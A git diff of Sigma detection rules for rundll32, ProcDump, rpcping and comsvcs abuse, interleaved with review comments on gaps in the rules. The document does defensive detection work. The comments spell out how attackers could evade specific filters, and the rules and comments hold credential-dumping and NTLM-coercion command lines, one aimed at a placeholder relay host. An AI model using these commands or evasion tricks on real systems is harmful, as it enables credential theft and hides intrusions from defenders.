@@ -1,12 +1,10 @@ title: Potential Renamed Rundll32 Execution id: 2569ed8c-1147-498a-9b8c-2ad3656b10ed related: - - id: 0ba1da6d-b6ce-4366-828c-18826c9de23e - type: derived + - id: 0ba1da6d-b6ce-4366-828c-18826c9de23e + type: derived status: test -description: Detects when 'DllRegisterServer' is called in the commandline and the - image is not rundll32. This could mean that the 'rundll32' utility has been renamed - in order to avoid detection +description: Detects when 'DllRegisterServer' is called in the commandline and the image is not rundll32. This could mean that the 'rundll32' utility has been renamed in order to avoid detection references: - https://twitter.com/swisscom_csirt/status/1331634525722521602?s=20 - https://app.any.run/tasks/f74c5157-8508-4ac6-9805-d63fe7b0d399/ @@ -23,9 +21,9 @@ detection: EventID: 4688 Channel: Security selection: - CommandLine|contains: DllRegisterServer + CommandLine|contains: DllRegisterServer filter: - NewProcessName|endswith: \rundll32.exe + NewProcessName|endswith: \rundll32.exe condition: process_creation and (selection and not filter) falsepositives: - Unlikely diff --git a/sigma/builtin/process_creation/proc_creation_win_renamed_sysinternals_procdump.yml b/sigma/builtin/process_creation/proc_creation_win_renamed_sysinternals_procdump.yml index 25a6a6f20..8b0b3b096 100644 --- a/sigma/builtin/process_creation/proc_creation_win_renamed_sysinternals_procdump.yml +++ b/sigma/builtin/process_creation/proc_creation_win_renamed_sysinternals_procdump.yml 
@@ -1,11 +1,10 @@ title: Renamed ProcDump Execution id: 4a0b2c7e-7cb2-495d-8b63-5f268e7bfd67 related: - - id: 03795938-1387-481b-9f4c-3f6241e604fe - type: obsoletes + - id: 03795938-1387-481b-9f4c-3f6241e604fe + type: obsoletes status: test -description: Detects the execution of a renamed ProcDump executable often used by - attackers or malware +description: Detects the execution of a renamed ProcDump executable often used by attackers or malware references: - https://docs.microsoft.com/en-us/sysinternals/downloads/procdump author: Florian Roth (Nextron Systems) @@ -24,19 +23,18 @@ detection: selection_org: OriginalFileName: procdump selection_args_ma: - CommandLine|contains: + CommandLine|contains: - ' -ma ' - ' /ma ' selection_args_other: - CommandLine|contains: + CommandLine|contains: - ' -accepteula ' - ' /accepteula ' filter: - NewProcessName|endswith: + NewProcessName|endswith: - \procdump.exe - \procdump64.exe - condition: process_creation and ((selection_org or all of selection_args_*) and - not filter) + condition: process_creation and ((selection_org or all of selection_args_*) and not filter) falsepositives: - Procdump illegaly bundled with legitimate software - Administrators who rename binaries (should be investigated) diff --git a/sigma/builtin/process_creation/proc_creation_win_renamed_vmnat.yml b/sigma/builtin/process_creation/proc_creation_win_renamed_vmnat.yml index 460a66e35..3f4902909 100644 --- a/sigma/builtin/process_creation/proc_creation_win_renamed_vmnat.yml +++ b/sigma/builtin/process_creation/proc_creation_win_renamed_vmnat.yml @@ -1,8 +1,7 @@ title: Renamed Vmnat.exe Execution id: 7b4f794b-590a-4ad4-ba18-7964a2832205 status: test -description: Detects renamed vmnat.exe or portable version that can be used for DLL - side-loading +description: Detects renamed vmnat.exe or portable version that can be used for DLL side-loading references: - https://twitter.com/malmoeb/status/1525901219247845376 author: elhoim 
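Review bot: On Security 4688 the `selection_org: OriginalFileName: procdump` branch cannot fire (4688 events have no OriginalFileName field as far as I know), which leaves only `all of selection_args_*`, i.e. a command line carrying both ` -ma ` and ` -accepteula `. A renamed ProcDump run with another dump switch (`-mp`, `-mm`) or without `-accepteula` (unnecessary once `HKCU\Software\Sysinternals\ProcDump\EulaAccepted` is set) is therefore missed, and because the entries require a trailing space, `-ma` as the last token is skipped as well. Consider documenting that the OriginalFileName branch is Sysmon-only and, for 4688, pairing a single switch with a target hint, e.g. `CommandLine|contains|all: [' -accepteula', 'lsass']`, rather than demanding both switches.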
@@ -21,7 +20,7 @@ detection: selection: OriginalFileName: vmnat.exe filter_rename: - NewProcessName|endswith: vmnat.exe + NewProcessName|endswith: vmnat.exe condition: process_creation and (selection and not 1 of filter_*) falsepositives: - Unknown diff --git a/sigma/builtin/process_creation/proc_creation_win_rpcping_credential_capture.yml b/sigma/builtin/process_creation/proc_creation_win_rpcping_credential_capture.yml index 91abc4d0c..31ffdcb3a 100644 --- a/sigma/builtin/process_creation/proc_creation_win_rpcping_credential_capture.yml +++ b/sigma/builtin/process_creation/proc_creation_win_rpcping_credential_capture.yml @@ -1,8 +1,7 @@ title: Capture Credentials with Rpcping.exe id: 93671f99-04eb-4ab4-a161-70d446a84003 status: test -description: Detects using Rpcping.exe to send a RPC test connection to the target - server (-s) and force the NTLM hash to be sent in the process. +description: Detects using Rpcping.exe to send a RPC test connection to the target server (-s) and force the NTLM hash to be sent in the process. references: - https://lolbas-project.github.io/lolbas/Binaries/Rpcping/ - https://twitter.com/vysecurity/status/974806438316072960 @@ -22,24 +21,24 @@ detection: EventID: 4688 Channel: Security use_rpcping: - NewProcessName|endswith: \rpcping.exe + NewProcessName|endswith: \rpcping.exe remote_server: - CommandLine|contains: + CommandLine|contains: - -s - /s ntlm_auth: - - CommandLine|contains|all: - - -u - - NTLM - - CommandLine|contains|all: - - /u - - NTLM - - CommandLine|contains|all: - - -t - - ncacn_np - - CommandLine|contains|all: - - /t - - ncacn_np + - CommandLine|contains|all: + - -u + - NTLM + - CommandLine|contains|all: + - /u + - NTLM + - CommandLine|contains|all: + - -t + - ncacn_np + - CommandLine|contains|all: + - /t + - ncacn_np condition: process_creation and (use_rpcping and remote_server and ntlm_auth) falsepositives: - Unlikely 
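Review bot: `filter_rename: NewProcessName|endswith: vmnat.exe` lacks the leading `\` that every other renamed-binary filter in this batch uses, so a copy renamed to something like `svc-vmnat.exe` still satisfies the filter and is excluded; it should read `NewProcessName|endswith: \vmnat.exe`. On top of that the sole selector is `OriginalFileName: vmnat.exe`, a Sysmon field that Security 4688 does not provide as far as I know, so unless the converter maps it the rule has no 4688-observable condition at all. That limitation belongs in the description rather than being left implicit behind `falsepositives: - Unknown`.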
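Review bot: `ntlm_auth` only looks for the literal `NTLM`, but per the rpcping documentation `-u` also accepts the numeric package id and `negotiate`, so `rpcping -s <host> -e 135 -a privacy -u 10` (or `-u negotiate`, which still falls back to NTLM against a server the client cannot Kerberos-authenticate to) presents nothing the rule matches unless `-t ncacn_np` happens to be present. Adding `- CommandLine|contains|all: ['-u', 'negotiate']` plus a `' -u 10'` / `' /u 10'` pair alongside the existing entries closes that. Separately, `remote_server`'s `- -s` / `- /s` are bare two-character substrings that also hit inside other switches and paths (`-server`, `/silent`, `C:\src`), so `' -s '` and `' /s '` with surrounding spaces would be tighter.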
diff --git a/sigma/builtin/process_creation/proc_creation_win_ruby_inline_command_execution.yml b/sigma/builtin/process_creation/proc_creation_win_ruby_inline_command_execution.yml index 785f711b2..1c2113081 100644 --- a/sigma/builtin/process_creation/proc_creation_win_ruby_inline_command_execution.yml +++ b/sigma/builtin/process_creation/proc_creation_win_ruby_inline_command_execution.yml @@ -1,8 +1,7 @@ title: Ruby Inline Command Execution id: 20a5ffa1-3848-4584-b6f8-c7c7fd9f69c8 status: test -description: Detects execution of ruby using the "-e" flag. This is could be used - as a way to launch a reverse shell or execute live ruby code. +description: Detects execution of ruby using the "-e" flag. This is could be used as a way to launch a reverse shell or execute live ruby code. references: - https://pentestmonkey.net/cheat-sheet/shells/reverse-shell-cheat-sheet - https://www.revshells.com/ @@ -19,10 +18,10 @@ detection: EventID: 4688 Channel: Security selection_img: - - NewProcessName|endswith: \ruby.exe - - OriginalFileName: ruby.exe + - NewProcessName|endswith: \ruby.exe + - OriginalFileName: ruby.exe selection_cli: - CommandLine|contains: ' -e' + CommandLine|contains: ' -e' condition: process_creation and (all of selection_*) falsepositives: - Unknown diff --git a/sigma/builtin/process_creation/proc_creation_win_rundll32_ads_stored_dll_execution.yml b/sigma/builtin/process_creation/proc_creation_win_rundll32_ads_stored_dll_execution.yml index 8e5bb45f0..d8e959994 100644 --- a/sigma/builtin/process_creation/proc_creation_win_rundll32_ads_stored_dll_execution.yml +++ b/sigma/builtin/process_creation/proc_creation_win_rundll32_ads_stored_dll_execution.yml 
@@ -1,8 +1,7 @@ title: Potential Rundll32 Execution With DLL Stored In ADS id: 9248c7e1-2bf3-4661-a22c-600a8040b446 status: test -description: Detects execution of rundll32 where the DLL being called is stored in - an Alternate Data Stream (ADS). +description: Detects execution of rundll32 where the DLL being called is stored in an Alternate Data Stream (ADS). references: - https://lolbas-project.github.io/lolbas/Binaries/Rundll32 author: Harjot Singh, '@cyb3rjy0t' @@ -19,10 +18,13 @@ detection: EventID: 4688 Channel: Security selection_img: - - NewProcessName|endswith: \rundll32.exe - - OriginalFileName: RUNDLL32.EXE + - NewProcessName|endswith: \rundll32.exe + - OriginalFileName: RUNDLL32.EXE selection_cli: - CommandLine|re: '[Rr][Uu][Nn][Dd][Ll][Ll]32(\.[Ee][Xx][Ee])? \S+?\w:\S+?:' + # Example: + # rundll32 "C:\ads\file.txt:ADSDLL.dll",DllMain + # Note: This doesn't cover the use case where a full path for the DLL isn't used. As it requires a more expensive regex + CommandLine|re: '[Rr][Uu][Nn][Dd][Ll][Ll]32(\.[Ee][Xx][Ee])? \S+?\w:\S+?:' condition: process_creation and (all of selection_*) falsepositives: - Unknown diff --git a/sigma/builtin/process_creation/proc_creation_win_rundll32_advpack_obfuscated_ordinal_call.yml b/sigma/builtin/process_creation/proc_creation_win_rundll32_advpack_obfuscated_ordinal_call.yml index 6f086a45e..49d2c3f99 100644 --- a/sigma/builtin/process_creation/proc_creation_win_rundll32_advpack_obfuscated_ordinal_call.yml +++ b/sigma/builtin/process_creation/proc_creation_win_rundll32_advpack_obfuscated_ordinal_call.yml 
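Review bot: The regex `[Rr][Uu][Nn][Dd][Ll][Ll]32(\.[Ee][Xx][Ee])? \S+?\w:\S+?:` requires a single space immediately after `rundll32`/`rundll32.exe`, so the usual quoted image form `"C:\Windows\System32\rundll32.exe" "C:\ads\file.txt:ADSDLL.dll",DllMain` fails on the closing quote, and because `\S+?` must consume at least one character before `\w:` the unquoted variant `rundll32 C:\ads\file.txt:ADSDLL.dll,DllMain` does not match either (unless I misread the lazy quantifiers, the drive letter can only be reached through a preceding `"`). Something like `[Rr][Uu][Nn][Dd][Ll][Ll]32(\.[Ee][Xx][Ee])?"? +"?\w:\S+?:` covers both the quoted and unquoted paths. The added comment already concedes the relative-path case; these two gaps belong in that note as well, since they are not a cost trade-off.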
@@ -1,8 +1,7 @@ title: Suspicious Advpack Call Via Rundll32.EXE id: a1473adb-5338-4a20-b4c3-126763e2d3d3 status: experimental -description: Detects execution of "rundll32" calling "advpack.dll" with potential - obfuscated ordinal calls in order to leverage the "RegisterOCX" function +description: Detects execution of "rundll32" calling "advpack.dll" with potential obfuscated ordinal calls in order to leverage the "RegisterOCX" function references: - https://twitter.com/Hexacorn/status/1224848930795552769 - http://www.hexacorn.com/blog/2020/02/05/stay-positive-lolbins-not/ @@ -18,16 +17,16 @@ detection: EventID: 4688 Channel: Security selection_img: - - NewProcessName|endswith: \rundll32.exe - - OriginalFileName: RUNDLL32.EXE - - CommandLine|contains: rundll32 + - NewProcessName|endswith: \rundll32.exe + - OriginalFileName: RUNDLL32.EXE + - CommandLine|contains: rundll32 selection_cli_dll: - CommandLine|contains: advpack + CommandLine|contains: advpack selection_cli_ordinal: - - CommandLine|contains|all: - - '#+' - - '12' - - CommandLine|contains: '#-' + - CommandLine|contains|all: + - '#+' + - '12' + - CommandLine|contains: '#-' condition: process_creation and (all of selection_*) falsepositives: - Unlikely diff --git a/sigma/builtin/process_creation/proc_creation_win_rundll32_by_ordinal.yml b/sigma/builtin/process_creation/proc_creation_win_rundll32_by_ordinal.yml index b0ab7d5c9..014fe54fc 100644 --- a/sigma/builtin/process_creation/proc_creation_win_rundll32_by_ordinal.yml +++ b/sigma/builtin/process_creation/proc_creation_win_rundll32_by_ordinal.yml 
@@ -21,20 +21,20 @@ detection: EventID: 4688 Channel: Security selection_img: - - NewProcessName|endswith: \rundll32.exe - - OriginalFileName: RUNDLL32.EXE + - NewProcessName|endswith: \rundll32.exe + - OriginalFileName: RUNDLL32.EXE selection_cli: - CommandLine|contains: + CommandLine|contains: - ',#' - ', #' - - '.dll #' - - '.ocx #' + - '.dll #' # Sysmon removes , in its log + - '.ocx #' # HermeticWizard filter_edge: - CommandLine|contains|all: + CommandLine|contains|all: - EDGEHTML.dll - '#141' filter_vsbuild_dll: - CommandLine|contains: + CommandLine|contains: - \FileTracker32.dll,#1 - \FileTracker32.dll",#1 - \FileTracker64.dll,#1 @@ -45,8 +45,7 @@ detection: - \Tracker.exe condition: process_creation and (all of selection_* and not 1 of filter_*) falsepositives: - - False positives depend on scripts and administrative tools used in the monitored - environment + - False positives depend on scripts and administrative tools used in the monitored environment - Windows control panel elements have been identified as source (mmc) level: high ruletype: Sigma diff --git a/sigma/builtin/process_creation/proc_creation_win_rundll32_inline_vbs.yml b/sigma/builtin/process_creation/proc_creation_win_rundll32_inline_vbs.yml index 8f6d1b795..17d6fab0f 100644 --- a/sigma/builtin/process_creation/proc_creation_win_rundll32_inline_vbs.yml +++ b/sigma/builtin/process_creation/proc_creation_win_rundll32_inline_vbs.yml @@ -1,8 +1,7 @@ title: Suspicious Rundll32 Invoking Inline VBScript id: 1cc50f3f-1fc8-4acf-b2e9-6f172e1fdebd status: test -description: Detects suspicious process related to rundll32 based on command line - that invokes inline VBScript as seen being used by UNC2452 +description: Detects suspicious process related to rundll32 based on command line that invokes inline VBScript as seen being used by UNC2452 references: - https://www.microsoft.com/security/blog/2021/03/04/goldmax-goldfinder-sibot-analyzing-nobelium-malware/ author: Florian Roth (Nextron Systems) 
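Review bot: `filter_edge` and `filter_vsbuild_dll` are `contains` allow-lists on free-floating strings, so an ordinal call that simply carries `EDGEHTML.dll` and `#141` (or `\FileTracker32.dll,#1`) anywhere on its command line — a trailing dummy argument after the real `evil.dll,#1`, or a DLL dropped as `C:\Users\x\FileTracker32.dll` — is suppressed by the very filter meant for the legitimate case. Tie them to the real invocation instead, either by constraining `ParentProcessName` or by matching the DLL in argument position with a `startswith`/full-path form rather than a bare `contains`. Also, the inline note `# Sysmon removes , in its log` was carried over from the Sysmon rule; this copy reads Security 4688, where the command line is logged as given, so the comment should say the comma-less variants are kept for parity with the Sysmon rule rather than implying 4688 strips commas.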
@@ -19,7 +18,7 @@ detection: EventID: 4688 Channel: Security selection: - CommandLine|contains|all: + CommandLine|contains|all: - rundll32.exe - Execute - RegRead diff --git a/sigma/builtin/process_creation/proc_creation_win_rundll32_installscreensaver.yml b/sigma/builtin/process_creation/proc_creation_win_rundll32_installscreensaver.yml index f68d24430..1799c29a1 100644 --- a/sigma/builtin/process_creation/proc_creation_win_rundll32_installscreensaver.yml +++ b/sigma/builtin/process_creation/proc_creation_win_rundll32_installscreensaver.yml @@ -1,8 +1,7 @@ title: Rundll32 InstallScreenSaver Execution id: 15bd98ea-55f4-4d37-b09a-e7caa0fa2221 status: test -description: An attacker may execute an application as a SCR File using rundll32.exe - desk.cpl,InstallScreenSaver +description: An attacker may execute an application as a SCR File using rundll32.exe desk.cpl,InstallScreenSaver references: - https://lolbas-project.github.io/lolbas/Libraries/Desk/ - https://github.com/redcanaryco/atomic-red-team/blob/0f229c0e42bfe7ca736a14023836d65baa941ed2/atomics/T1218.011/T1218.011.md#atomic-test-13---rundll32-with-deskcpl @@ -20,10 +19,10 @@ detection: EventID: 4688 Channel: Security selection_img: - - NewProcessName|endswith: \rundll32.exe - - OriginalFileName: RUNDLL32.EXE + - NewProcessName|endswith: \rundll32.exe + - OriginalFileName: RUNDLL32.EXE selection_cli: - CommandLine|contains: InstallScreenSaver + CommandLine|contains: InstallScreenSaver condition: process_creation and (all of selection_*) falsepositives: - Legitimate installation of a new screensaver diff --git a/sigma/builtin/process_creation/proc_creation_win_rundll32_js_runhtmlapplication.yml b/sigma/builtin/process_creation/proc_creation_win_rundll32_js_runhtmlapplication.yml index 7db7ca701..abf19e8e0 100644 --- a/sigma/builtin/process_creation/proc_creation_win_rundll32_js_runhtmlapplication.yml +++ b/sigma/builtin/process_creation/proc_creation_win_rundll32_js_runhtmlapplication.yml 
@@ -1,8 +1,7 @@ title: Rundll32 JS RunHTMLApplication Pattern id: 9f06447a-a33a-4cbe-a94f-a3f43184a7a3 status: test -description: Detects suspicious command line patterns used when rundll32 is used to - run JavaScript code +description: Detects suspicious command line patterns used when rundll32 is used to run JavaScript code references: - http://hyp3rlinx.altervista.org/advisories/MICROSOFT_WINDOWS_DEFENDER_DETECTION_BYPASS.txt author: Florian Roth (Nextron Systems) @@ -17,12 +16,12 @@ detection: EventID: 4688 Channel: Security selection1: - CommandLine|contains|all: + CommandLine|contains|all: - rundll32 - javascript - ..\..\mshtml,RunHTMLApplication selection2: - CommandLine|contains: ;document.write();GetObject("script + CommandLine|contains: ;document.write();GetObject("script condition: process_creation and (1 of selection*) falsepositives: - Unlikely diff --git a/sigma/builtin/process_creation/proc_creation_win_rundll32_keymgr.yml b/sigma/builtin/process_creation/proc_creation_win_rundll32_keymgr.yml index 78d4ccdb8..b1d62bbe2 100644 --- a/sigma/builtin/process_creation/proc_creation_win_rundll32_keymgr.yml +++ b/sigma/builtin/process_creation/proc_creation_win_rundll32_keymgr.yml @@ -1,8 +1,7 @@ title: Suspicious Key Manager Access id: a4694263-59a8-4608-a3a0-6f8d3a51664c status: test -description: Detects the invocation of the Stored User Names and Passwords dialogue - (Key Manager) +description: Detects the invocation of the Stored User Names and Passwords dialogue (Key Manager) references: - https://twitter.com/NinjaParanoid/status/1516442028963659777 author: Florian Roth (Nextron Systems) 
@@ -19,10 +18,10 @@ detection: EventID: 4688 Channel: Security selection_img: - - NewProcessName|endswith: \rundll32.exe - - OriginalFileName: RUNDLL32.EXE + - NewProcessName|endswith: \rundll32.exe + - OriginalFileName: RUNDLL32.EXE selection_cli: - CommandLine|contains|all: + CommandLine|contains|all: - keymgr - KRShowKeyMgr condition: process_creation and (all of selection_*) diff --git a/sigma/builtin/process_creation/proc_creation_win_rundll32_mshtml_runhtmlapplication.yml b/sigma/builtin/process_creation/proc_creation_win_rundll32_mshtml_runhtmlapplication.yml index 727b94132..f7522168c 100644 --- a/sigma/builtin/process_creation/proc_creation_win_rundll32_mshtml_runhtmlapplication.yml +++ b/sigma/builtin/process_creation/proc_creation_win_rundll32_mshtml_runhtmlapplication.yml @@ -1,12 +1,10 @@ title: Mshtml DLL RunHTMLApplication Abuse id: 4782eb5a-a513-4523-a0ac-f3082b26ac5c related: - - id: 9f06447a-a33a-4cbe-a94f-a3f43184a7a3 - type: derived + - id: 9f06447a-a33a-4cbe-a94f-a3f43184a7a3 + type: derived status: test -description: Detects suspicious command line using the "mshtml.dll" RunHTMLApplication - export to run arbitrary code via different protocol handlers (vbscript, javascript, - file, htpp...) +description: Detects suspicious command line using the "mshtml.dll" RunHTMLApplication export to run arbitrary code via different protocol handlers (vbscript, javascript, file, htpp...) references: - https://twitter.com/n1nj4sec/status/1421190238081277959 author: Nasreddine Bencherchali (Nextron Systems) @@ -21,7 +19,7 @@ detection: EventID: 4688 Channel: Security selection: - CommandLine|contains|all: + CommandLine|contains|all: - \..\ - mshtml - RunHTMLApplication diff --git a/sigma/builtin/process_creation/proc_creation_win_rundll32_no_params.yml b/sigma/builtin/process_creation/proc_creation_win_rundll32_no_params.yml index 032db1342..28445a6a3 100644 --- a/sigma/builtin/process_creation/proc_creation_win_rundll32_no_params.yml 
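Review bot: The re-flowed description still carries the typo `htpp` in `(vbscript, javascript, file, htpp...)`; since the commit rewrites that line anyway it should read `http`. A one-line comment above `selection` would also help the next editor keep the odd-looking `\..\` entry, e.g. `# the \..\ is part of the LOLBAS invocation rundll32 javascript:"\..\mshtml,RunHTMLApplication"; do not drop it`, so it is not mistaken for noise and "simplified" away.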
+++ b/sigma/builtin/process_creation/proc_creation_win_rundll32_no_params.yml @@ -1,8 +1,7 @@ title: Rundll32 Execution Without CommandLine Parameters id: 1775e15e-b61b-4d14-a1a3-80981298085a status: experimental -description: Detects suspicious start of rundll32.exe without any parameters as found - in CobaltStrike beacon activity +description: Detects suspicious start of rundll32.exe without any parameters as found in CobaltStrike beacon activity references: - https://www.cobaltstrike.com/help-opsec - https://twitter.com/ber_m1ng/status/1397948048135778309 @@ -20,7 +19,7 @@ detection: EventID: 4688 Channel: Security selection: - CommandLine|endswith: + CommandLine|endswith: - \rundll32.exe - \rundll32.exe" - \rundll32 diff --git a/sigma/builtin/process_creation/proc_creation_win_rundll32_ntlmrelay.yml b/sigma/builtin/process_creation/proc_creation_win_rundll32_ntlmrelay.yml index 96ea3b4c5..95f235ef8 100644 --- a/sigma/builtin/process_creation/proc_creation_win_rundll32_ntlmrelay.yml +++ b/sigma/builtin/process_creation/proc_creation_win_rundll32_ntlmrelay.yml @@ -1,8 +1,7 @@ title: Suspicious NTLM Authentication on the Printer Spooler Service id: bb76d96b-821c-47cf-944b-7ce377864492 status: test -description: Detects a privilege elevation attempt by coercing NTLM authentication - on the Printer Spooler service +description: Detects a privilege elevation attempt by coercing NTLM authentication on the Printer Spooler service references: - https://twitter.com/med0x2e/status/1520402518685200384 - https://github.com/elastic/detection-rules/blob/dd224fb3f81d0b4bf8593c5f02a029d647ba2b2d/rules/windows/credential_access_relay_ntlm_auth_via_http_spoolss.toml 
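Review bot: All three `CommandLine|endswith` entries require a backslash before the name, so a parameter-less start issued by bare name (`rundll32.exe` or `rundll32`, i.e. a PATH-resolved launch or a beacon whose spawnto is just the file name) is not caught although it is exactly what the description targets. `rundll32.exe`, `rundll32.exe"` and `rundll32` are supersets of the current values and, since a parameter-less launch has no arguments to collide with, replacing the three entries with those is a free widening. If the data source preserves trailing whitespace, `rundll32.exe ` (with a trailing space) is a further variant some launchers emit and could be added too.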
@@ -21,13 +20,13 @@ detection: EventID: 4688 Channel: Security selection_img: - - NewProcessName|endswith: \rundll32.exe - - OriginalFileName: RUNDLL32.EXE + - NewProcessName|endswith: \rundll32.exe + - OriginalFileName: RUNDLL32.EXE selection_cli: - CommandLine|contains|all: + CommandLine|contains|all: - C:\windows\system32\davclnt.dll,DavSetCookie - http - CommandLine|contains: + CommandLine|contains: - spoolss - srvsvc - /print/pipe/ diff --git a/sigma/builtin/process_creation/proc_creation_win_rundll32_obfuscated_ordinal_call.yml b/sigma/builtin/process_creation/proc_creation_win_rundll32_obfuscated_ordinal_call.yml index 430df935b..a02f1e37c 100644 --- a/sigma/builtin/process_creation/proc_creation_win_rundll32_obfuscated_ordinal_call.yml +++ b/sigma/builtin/process_creation/proc_creation_win_rundll32_obfuscated_ordinal_call.yml @@ -16,11 +16,11 @@ detection: EventID: 4688 Channel: Security selection_img: - - NewProcessName|endswith: \rundll32.exe - - OriginalFileName: RUNDLL32.EXE - - CommandLine|contains: rundll32 + - NewProcessName|endswith: \rundll32.exe + - OriginalFileName: RUNDLL32.EXE + - CommandLine|contains: rundll32 selection_cli: - CommandLine|contains: + CommandLine|contains: - '#+' - '#-' condition: process_creation and (all of selection_*) diff --git a/sigma/builtin/process_creation/proc_creation_win_rundll32_parent_explorer.yml b/sigma/builtin/process_creation/proc_creation_win_rundll32_parent_explorer.yml index 429b233cf..b299f123a 100644 --- a/sigma/builtin/process_creation/proc_creation_win_rundll32_parent_explorer.yml +++ b/sigma/builtin/process_creation/proc_creation_win_rundll32_parent_explorer.yml 
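Review bot: `selection_cli` hard-codes `C:\windows\system32\davclnt.dll,DavSetCookie`, so the same coercion issued as `rundll32 davclnt.dll,DavSetCookie http://<relay>/print/pipe/spoolss` (rundll32 resolves the bare name from System32 itself), from `SysWOW64`, via `%SystemRoot%`, or on a host whose system drive is not `C:` never matches. Drop the directory prefix so the entry reads `- davclnt.dll,DavSetCookie`; the `http` requirement and the second `CommandLine|contains` list (`spoolss`, `srvsvc`, `/print/pipe/`) already pin down the technique, and `contains` is case-insensitive so nothing is lost. A short comment that `DavSetCookie` is the WebDAV client export being abused would also help, since the title talks about the spooler and a reader may not see why davclnt is in the pattern.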
@@ -1,9 +1,7 @@ title: Rundll32 Spawned Via Explorer.EXE id: 1723e720-616d-4ddc-ab02-f7e3685a4713 status: experimental -description: Detects execution of "rundll32.exe" with a parent process of Explorer.exe. - This has been observed by variants of Raspberry Robin, as first reported by Red - Canary. +description: Detects execution of "rundll32.exe" with a parent process of Explorer.exe. This has been observed by variants of Raspberry Robin, as first reported by Red Canary. references: - https://redcanary.com/blog/raspberry-robin/ - https://thedfirreport.com/2022/09/26/bumblebee-round-two/ @@ -22,11 +20,11 @@ detection: selection_parent: ParentProcessName|endswith: \explorer.exe selection_img: - - NewProcessName|endswith: \rundll32.exe - - OriginalFileName: RUNDLL32.EXE + - NewProcessName|endswith: \rundll32.exe + - OriginalFileName: RUNDLL32.EXE filter_main_generic: - - CommandLine|contains: ' C:\Windows\System32\' - - CommandLine|endswith: ' -localserver 22d8c27b-47a1-48d1-ad08-7da7abd79617' + - CommandLine|contains: ' C:\Windows\System32\' # The space at the start is required + - CommandLine|endswith: ' -localserver 22d8c27b-47a1-48d1-ad08-7da7abd79617' # Windows 10 volume control condition: process_creation and (all of selection_* and not 1 of filter_main_*) falsepositives: - Unknown diff --git a/sigma/builtin/process_creation/proc_creation_win_rundll32_process_dump_via_comsvcs.yml b/sigma/builtin/process_creation/proc_creation_win_rundll32_process_dump_via_comsvcs.yml index 99e4fb496..9482180e6 100644 --- a/sigma/builtin/process_creation/proc_creation_win_rundll32_process_dump_via_comsvcs.yml +++ b/sigma/builtin/process_creation/proc_creation_win_rundll32_process_dump_via_comsvcs.yml 
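Review bot: `filter_main_generic` excludes any rundll32 whose command line merely contains ` C:\Windows\System32\`, so a Raspberry Robin-style launch can defeat its own rule by adding a harmless second argument (`rundll32 C:\Users\Public\x.dll,Run C:\Windows\System32\`); a `contains` on a directory name is an allow-list the attacker controls. Anchor it to the DLL argument position instead, e.g. `CommandLine|contains: ['rundll32.exe C:\Windows\System32\', 'rundll32.exe" C:\Windows\System32\']`, which still covers the quoted and unquoted legitimate forms. The added remark `# The space at the start is required` would be clearer if it said why: without the space the image's own `C:\Windows\System32\rundll32.exe` path typically satisfies the filter and nothing is ever alerted.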
@@ -1,11 +1,10 @@ title: Process Memory Dump Via Comsvcs.DLL id: 646ea171-dded-4578-8a4d-65e9822892e3 related: - - id: 09e6d5c0-05b8-4ff8-9eeb-043046ec774c - type: obsoletes + - id: 09e6d5c0-05b8-4ff8-9eeb-043046ec774c + type: obsoletes status: test -description: Detects a process memory dump via "comsvcs.dll" using rundll32, covering - multiple different techniques (ordinal, minidump function, etc.) +description: Detects a process memory dump via "comsvcs.dll" using rundll32, covering multiple different techniques (ordinal, minidump function, etc.) references: - https://twitter.com/shantanukhande/status/1229348874298388484 - https://twitter.com/pythonresponder/status/1385064506049630211?s=21 @@ -31,25 +30,25 @@ detection: EventID: 4688 Channel: Security selection_img: - - NewProcessName|endswith: \rundll32.exe - - OriginalFileName: RUNDLL32.EXE - - CommandLine|contains: rundll32 + - NewProcessName|endswith: \rundll32.exe + - OriginalFileName: RUNDLL32.EXE + - CommandLine|contains: rundll32 selection_cli_1: - CommandLine|contains|all: + CommandLine|contains|all: - comsvcs - full - CommandLine|contains: + CommandLine|contains: - '#-' - '#+' - '#24' - '24 ' - - MiniDump + - MiniDump # Matches MiniDump and MinidumpW selection_generic: - CommandLine|contains|all: + CommandLine|contains|all: - '24' - comsvcs - full - CommandLine|contains: + CommandLine|contains: - ' #' - ',#' - ', #' diff --git a/sigma/builtin/process_creation/proc_creation_win_rundll32_registered_com_objects.yml b/sigma/builtin/process_creation/proc_creation_win_rundll32_registered_com_objects.yml index 08d382a8c..1df443948 100644 --- a/sigma/builtin/process_creation/proc_creation_win_rundll32_registered_com_objects.yml +++ b/sigma/builtin/process_creation/proc_creation_win_rundll32_registered_com_objects.yml 
@@ -20,13 +20,13 @@ detection: EventID: 4688 Channel: Security selection_img: - - NewProcessName|endswith: \rundll32.exe - - OriginalFileName: RUNDLL32.EXE + - NewProcessName|endswith: \rundll32.exe + - OriginalFileName: RUNDLL32.EXE selection_cli: - CommandLine|contains: + CommandLine|contains: - '-sta ' - '-localserver ' - CommandLine|contains|all: + CommandLine|contains|all: - '{' - '}' condition: process_creation and (all of selection_*) diff --git a/sigma/builtin/process_creation/proc_creation_win_rundll32_run_locations.yml b/sigma/builtin/process_creation/proc_creation_win_rundll32_run_locations.yml index 041b6efbf..30231130a 100644 --- a/sigma/builtin/process_creation/proc_creation_win_rundll32_run_locations.yml +++ b/sigma/builtin/process_creation/proc_creation_win_rundll32_run_locations.yml @@ -19,21 +19,20 @@ detection: EventID: 4688 Channel: Security selection: - - NewProcessName|contains: - - :\RECYCLER\ - - :\SystemVolumeInformation\ - - NewProcessName|startswith: - - C:\Windows\Tasks\ - - C:\Windows\debug\ - - C:\Windows\fonts\ - - C:\Windows\help\ - - C:\Windows\drivers\ - - C:\Windows\addins\ - - C:\Windows\cursors\ - - C:\Windows\system32\tasks\ + - NewProcessName|contains: + - :\RECYCLER\ + - :\SystemVolumeInformation\ + - NewProcessName|startswith: + - C:\Windows\Tasks\ + - C:\Windows\debug\ + - C:\Windows\fonts\ + - C:\Windows\help\ + - C:\Windows\drivers\ + - C:\Windows\addins\ + - C:\Windows\cursors\ + - C:\Windows\system32\tasks\ condition: process_creation and selection falsepositives: - - False positives depend on scripts and administrative tools used in the monitored - environment + - False positives depend on scripts and administrative tools used in the monitored environment level: medium ruletype: Sigma diff --git a/sigma/builtin/process_creation/proc_creation_win_rundll32_script_run.yml b/sigma/builtin/process_creation/proc_creation_win_rundll32_script_run.yml index 45db31d56..5d07a83d0 100644 
